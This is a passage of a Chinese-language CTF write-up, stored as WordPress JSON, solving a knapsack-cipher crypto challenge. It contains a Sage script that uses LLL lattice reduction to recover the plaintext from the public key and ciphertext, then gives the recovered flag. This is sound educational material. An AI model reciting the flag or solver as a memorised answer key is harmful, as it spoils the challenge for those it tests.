\u52a0\u5bc6\u7b97\u6cd5\u9996\u5148\u751f\u6210\u4e86\u4e00\u4e2a\u8d85\u9012\u589e\u5e8f\u5217\u4f5c\u4e3a\u79c1\u94a5\uff0c\u7136\u540e\u5229\u7528\u968f\u673a\u751f\u6210\u7684\u6a21\u6570 N \u548c\u4e58\u6570 mask\u5c06\u5176\u8f6c\u5316\u4e3a\u4f2a\u968f\u673a\u7684\u516c\u94a5\u5e8f\u5217 pk\u3002\u6700\u7ec8\u7684\u5bc6\u6587 enc \u662f\u660e\u6587\u4e8c\u8fdb\u5236\u4f4d\u4e0e\u516c\u94a5\u5e8f\u5217\u5143\u7d20\u7684\u7ebf\u6027\u7ec4\u5408\uff0c\u672c\u8d28\u4e0a\u662f\u4e00\u4e2a\u5b50\u96c6\u548c\u95ee\u9898<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u8fc7\u7a0b<\/p>\n\n\n\n
\u7531\u4e8e\u76f4\u63a5\u6c42\u89e3\u5b50\u96c6\u548c\u95ee\u9898\u662f NP \u96be\u7684\uff0c\u4f46\u8fd9\u91cc\u7684\u5bc6\u5ea6\u8f83\u4f4e\uff0c\u53ef\u4ee5\u76f4\u63a5\u6784\u9020\u683c\uff0c\u5e76\u5229\u7528 LLL \u7b97\u6cd5\u6c42\u6700\u77ed\u5411\u91cf\u6765\u6062\u590d\u660e\u6587\u4f4d\u5e8f\u5217\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import ast\nfrom Crypto.Util.number import long_to_bytes\n\nwith open('pk.txt', 'r') as f:\n    pk = ast.literal_eval(f.read().strip())\n\nwith open('enc.txt', 'r') as f:\n    enc = int(f.read().strip())\n\nn = len(pk)\nK = 2**256\nM = Matrix(ZZ, n + 1, n + 1)\n\nfor i in range(n):\n    M[i, i] = 2\n    M[i, n] = pk[i] * K\n    M[n, i] = -1\n\nM[n, n] = -enc * K\n\nreduced_M = M.LLL()\n\nfor row in reduced_M:\n    if row[-1] == 0:\n        is_valid = True\n        for i in range(n):\n            if abs(row[i]) != 1:\n                is_valid = False\n                break\n\n        if is_valid:\n            bits_option1 = [1 if row[i] == 1 else 0 for i in range(n)]\n            bits_option2 = [1 if row[i] == -1 else 0 for i in range(n)]\n\n            if sum(bits_option1[i] * pk[i] for i in range(n)) == enc:\n                bits = bits_option1\n            elif sum(bits_option2[i] * pk[i] for i in range(n)) == enc:\n                bits = bits_option2\n            else:\n                continue\n\n            bit_str = ''.join(map(str, bits))\n            flag = long_to_bytes(int(bit_str, 2))\n            print(flag.decode('utf-8', errors='ignore'))\n            break<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{345Y_CRYP70}<\/code><\/pre>\n\n\n\n
\u603b\u7ed3<\/h1>\n\n\n\n
\u9898\u76ee\u633a\u6709\u610f\u601d\u7684\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u524d\u8a00 \u6bd4\u8d5b\u65f6\u95f4\u975e\u5e38\u5f97\u957f\uff0c\u6709\u4e9b\u9898\u76ee\u4e0a\u7ebf\u4e86\uff0c\u4e2d\u95f4\u4e5f\u4e0b\u4e86\u4e00\u4e9b\u9898\u76ee\uff0c\u4f46\u662f\u540e\u9762\u597d\u50cf\u5c31\u6ca1\u6709\u4e0a\u65b0\u9898\u76ee\u4e86\u3002 \u961f\u4f0d\u540d\u5b57:flag […]<\/p>\n","protected":false},"author":1,"featured_media":3569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,1,29],"tags":[],"class_list":["post-3396","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-learn"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/3396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3396"}],"version-history":[{"count":1,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/3396\/revisions"}],"predecessor-version":[{"id":3570,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/3396\/revisions\/3570"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/media\/3569"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}